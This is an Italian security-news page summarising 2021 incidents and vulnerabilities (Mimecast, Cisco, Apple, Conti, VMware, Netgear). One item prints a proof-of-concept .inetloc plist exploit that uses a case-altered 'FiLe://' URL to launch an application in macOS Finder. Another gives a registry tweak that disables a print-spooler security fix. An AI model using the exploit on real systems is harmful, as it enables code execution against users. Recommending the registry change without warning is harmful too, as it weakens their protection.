Connect with us

News

Mimecast: Hacker hanno compromesso il codice sorgente

Redazione

Pubblicato

il

La società di sicurezza Mimecast ha confermato che hacker di SolarWinds che hanno violato la sua rete all’inizio di quest’anno sono riusciti a scaricare il codice sorgente da un numero limitato di archivi.

Per violare la rete di Mimecast, è stata utilizzata la  backdoor Sunburst , un malware distribuito dagli hacker di SolarWinds a circa 18.000 clienti utilizzando il meccanismo di aggiornamento automatico compromesso della piattaforma di monitoraggio IT SolarWinds Orion.

I prodotti Mimecast sono utilizzati da oltre 36.000 clienti, di cui il 10% pari a circa 3.600 potenziali clienti interessati.

La nostra indagine ha rivelato attività sospette all’interno di un segmento del nostro ambiente della griglia di produzione contenente un piccolo numero di server Windows. Lo spostamento dal punto di accesso iniziale a questi server è coerente con il meccanismo descritto da Microsoft e da altre organizzazioni che hanno documentato il modello di attacco . Abbiamo stabilito che hacker hanno sfruttato il nostro ambiente Windows per eseguire query e potenzialmente estrarre determinate credenziali dell’account di servizio crittografate create dai clienti ospitati negli Stati Uniti e nel Regno Unito. Queste credenziali stabiliscono connessioni dai tenant Mimecast a servizi locali e cloud, che includono LDAP, Azure Active Directory, servizi Web Exchange, inserimento nel journal POP3 e percorsi di consegna autenticati da SMTP. Non abbiamo alcuna prova che qualcuno abbia avuto accesso alla posta elettronica o archiviato i contenuti da noi detenuti per conto dei nostri clienti. – Mimecast

Facebook Comment

News

Cisco corregge 3 bug critici che interessano il software IOS XE

Redazione

Pubblicato

il

Cisco Systems ha implementato patch per correggere tre vulnerabilità di sicurezza critiche nel suo sistema operativo di rete IOS XE che potrebbero potenzialmente eseguire codice arbitrario con privilegi amministrativi e attivare una condizione denial-of-service (DoS) su dispositivi vulnerabili .

L’elenco dei tre bug è il seguente:

  • CVE-2021-34770 (CVSS score: 10.0) – Cisco IOS XE Software for Catalyst 9000 Family Wireless Controllers CAPWAP Remote Code Execution Vulnerability
  • CVE-2021-34727 (CVSS score: 9.8) – Cisco IOS XE SD-WAN Software Buffer Overflow Vulnerability
  • CVE-2021-1619 (CVSS score: 9.8) – Cisco IOS XE Software NETCONF and RESTCONF Authentication Bypass Vulnerability

Il bug più grave è CVE-2021-34770, che Cisco chiama un “errore logico” che si verifica durante l’elaborazione dei pacchetti CAPWAP (Control And Provisioning of Wireless Access Point) che consentono a un controller wireless centrale di gestire un gruppo di punti di accesso.

Continua a Leggere

News

Apple corregge bug zero-day utilizzato per hackerare iPhone e Mac

Redazione

Pubblicato

il

Apple ha rilasciato aggiornamenti di sicurezza per correggere una vulnerabilità zero-day sfruttata in natura dagli aggressori per hackerare iPhone e Mac con versioni precedenti di iOS e macOS.

Lo zero-day aggiornato oggi (tracciato come CVE-2021-30869) [ 1 ,  2 ] è stato trovato nel kernel del sistema operativo XNU ed è stato segnalato da Erye Hernandez e Clément Lecigne di Google Threat Analysis Group e Ian Beer di Google Project Zero .

L’elenco completo dei dispositivi interessati include:

  • iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3 e iPod touch (6a generazione) con iOS 12.5.5
  • e Mac con aggiornamento di sicurezza 2021-006 Catalina

Continua a Leggere

News

FBI, CISA e NSA avvertono dell’escalation degli attacchi ransomware Conti

Redazione

Pubblicato

il

Le tre agenzie federali statunitensi esortano gli amministratori IT aziendali a rivedere la posizione di sicurezza della rete delle loro organizzazioni e ad attuare le azioni immediate delineate nell’avviso congiunto per difendersi dal ransomware Conti.

Secondo le tre agenzie, gli operatori di ransomware Conti sono stati alla base di oltre 400 attacchi che hanno colpito entità statunitensi e internazionali.

“La Cybersecurity and Infrastructure Security Agency (CISA) e il Federal Bureau of Investigation (FBI) hanno osservato l’aumento dell’uso del ransomware Conti in oltre 400 attacchi contro organizzazioni statunitensi e internazionali”, si legge nell’advisory .

Continua a Leggere

News

Vulnerabilità VMware vCenter – Aggiornamento urgente

Redazione

Pubblicato

il

Hacker hanno iniziato a prendere di mira i server VMware vCenter esposti a Internet senza patch contro una vulnerabilità critica di caricamento file arbitraria che potrebbe portare all’esecuzione di codice remoto.

La falla di sicurezza rilevata come  CVE-2021-22005 ha un  impatto su tutte le distribuzioni di vCenter Server 6.7 e 7.0 con configurazioni predefinite.

In questo momento, secondo il  motore di ricerca Shodan ci sono migliaia di server vCenter potenzialmente vulnerabili , raggiungibili su Internet ed esposti ad attacchi .

Si consiglia un aggiornamento immediato in particolare per attività aziendali.

 

Continua a Leggere

News

Bug RCE vulnerabilità rivelata in diversi modelli di router Netgear

Redazione

Pubblicato

il

Netgear ha rilasciato patch per porre rimedio a una vulnerabilità di elevata gravità relativa all’esecuzione di codice in modalità remota che colpisce più router e che potrebbe essere sfruttata da aggressori remoti per assumere il controllo di un sistema interessato.

Tracciato come CVE-2021-40847 (punteggio CVSS: 8.1), ha impatto sui seguenti modelli:

  • R6400v2 (fixed in firmware version 1.0.4.120)
  • R6700 (fixed in firmware version 1.0.2.26)
  • R6700v3 (fixed in firmware version 1.0.4.120)
  • R6900 (fixed in firmware version 1.0.2.26)
  • R6900P (fixed in firmware version 3.3.142_HOTFIX)
  • R7000 (fixed in firmware version 1.0.11.128)
  • R7000P (fixed in firmware version 1.3.3.142_HOTFIX)
  • R7850 (fixed in firmware version 1.0.5.76)
  • R7900 (fixed in firmware version 1.0.4.46)
  • R8000 (fixed in firmware version 1.0.4.76)
  • RS400 (fixed in firmware version 1.5.1.80)

Secondo il ricercatore di sicurezza GRIMM Adam Nichols, la vulnerabilità risiede all’interno di Circle , un componente di terze parti incluso nel firmware che offre funzionalità di controllo parentale, con il demone di aggiornamento Circle abilitato per l’esecuzione di default anche se il router non è stato configurato per limitare tempo Internet giornaliero per siti Web e app

Continua a Leggere

News

Grave vulnerabilità zero-day colpisce i computer Apple macOS

Redazione

Pubblicato

il

Ricercatori martedì hanno rivelato i dettagli di una vulnerabilità zero-day senza patch in macOS Finder che potrebbe essere utilizzata per indurre gli utenti a eseguire comandi arbitrari sulle macchine.

“Una vulnerabilità in macOS Finder consente ai file con  estensione inetloc di eseguire comandi arbitrari, questi file possono essere incorporati all’interno di email senza fornire un prompt o un avviso all’utente”, SSD Secure Disclosure in una nota dell’advisory.

Exploit:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
  <dict>
    <key>URL</key>
    <string>FiLe:////////////////////////System/Applications/Calculator.app</string>
  </dict>
</plist>

Demo:

Continua a Leggere

News

Come correggere l’errore di stampa di rete di Windows 0x00000011b

Redazione

Pubblicato

il

Un aggiornamento della sicurezza di Windows rilasciato a gennaio sta causando agli utenti di Windows errori 0x00000011b durante la stampa su stampanti di rete.

Nel gennaio 2021, Microsoft ha rilasciato un aggiornamento di sicurezza per correggere una “vulnerabilità di spoofing dello spooler di stampa di Windows” rilevata come CVE-2021-1678 . Tuttavia tale aggiornamento non ha protetto automaticamente i dispositivi dalla vulnerabilità.

Per correggere il problema apri l’editor del registro di Windows e vai alla chiave HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print , crea un nuovo valore DWORD-32 bit denominato RpcAuthnLevelPrivacyEnabled e impostalo su 0 , come mostrato nel file di registro di seguito.

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print]
"RpcAuthnLevelPrivacyEnabled"=dword:00000000

 

Continua a Leggere

In Edicola & Digitale


255 – Dal 5 Agosto 2021!

Forum

Facebook

Trending

IN EDICOLA & DIGITALE